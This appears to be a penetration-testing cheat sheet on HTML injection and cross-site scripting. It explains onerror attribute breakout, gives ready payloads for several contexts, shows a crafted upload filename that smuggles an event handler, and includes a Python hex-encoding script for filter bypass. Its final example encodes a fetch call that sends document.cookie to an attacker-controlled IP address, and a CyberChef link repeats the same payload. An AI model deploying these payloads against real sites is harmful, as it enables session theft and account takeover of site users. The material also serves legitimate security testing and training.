HTML Injection

Tests if the website renders HTML tags

<b>tokyo</b>

Common characters that may be filtered

Parentheses () - Required for JavaScript function calls
Semicolons ; - Used to terminate JavaScript statements
Quotes ' - May be filtered while " is not
Angle brackets <> - HTML tag delimiters

The OnError Bypass Method

The onerror event handler is one of the most reliable HTML injection techniques because it triggers automatically when an HTML element fails to load a resource.

This makes it ideal for bypassing input filters that don't sanitize quotes

Basic Syntax Structure

x" onerror="PAYLOAD" x="

Breakdown

x" - Closes the current HTML attribute value
onerror="" - Injects the JavaScript event handler
x=" - Opens a new attribute to maintain valid HTML syntax

File Upload Context

When a user uploads a file, the filename gets inserted into the src attribute. We can exploit this by using a malicious filename

<img src="<?php echo $cat['photo_path']; ?>" alt="x" onerror="" x="" class="cat-photo">

Trigger the Error

Content-Disposition: form-data; name="cat_photo"; filename="x\"onerror=\"[encoded_payload]\" x=\".png"
Content-Type: image/png

GIF89a;
test

Context-Aware Payload Construction

For HTML attribute injection:

filename" onerror="alert(document.domain)" x="

For content injection:

<img src=x onerror="alert(1)">

When dealing with filename injection:

malicious" onerror="payload" x=".txt

For text inputs rendered in HTML:

test" onmouseover="alert(document.cookie)" x="

Bypass Using HTML Hex Encoding

Python encoding script

#!/usr/bin/python3
import sys

if len(sys.argv) != 2:
    print(f'[!] Usage: {sys.argv[0]} <payload>')
    sys.exit(1)

string = sys.argv[1]

def Encoding(string):
    output = ''
    for character in string:
        output += '&#x' + hex(ord(character))[2:]
    return output

if __name__ == '__main__':
    hexHtmlEncoding = Encoding(string)
    print(hexHtmlEncoding)

Example

python3 encode.py "fetch('http://10.10.14.91:8000/?cookie=' + document.cookie);"

Cyber-Chef Recipe example

https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity(true,'Hex%20entities')Find_/_Replace(%7B'option':'Regex','string':';'%7D,'',true,false,true,false)&input=ZmV0Y2goJ2h0dHA6Ly8xMC4xMC4xNC45MTo4MDAwLz9jb29raWU9JyArIGRvY3VtZW50LmNvb2tpZSk7&ieol=CRLF&oeol=FF

Last updated 24 days ago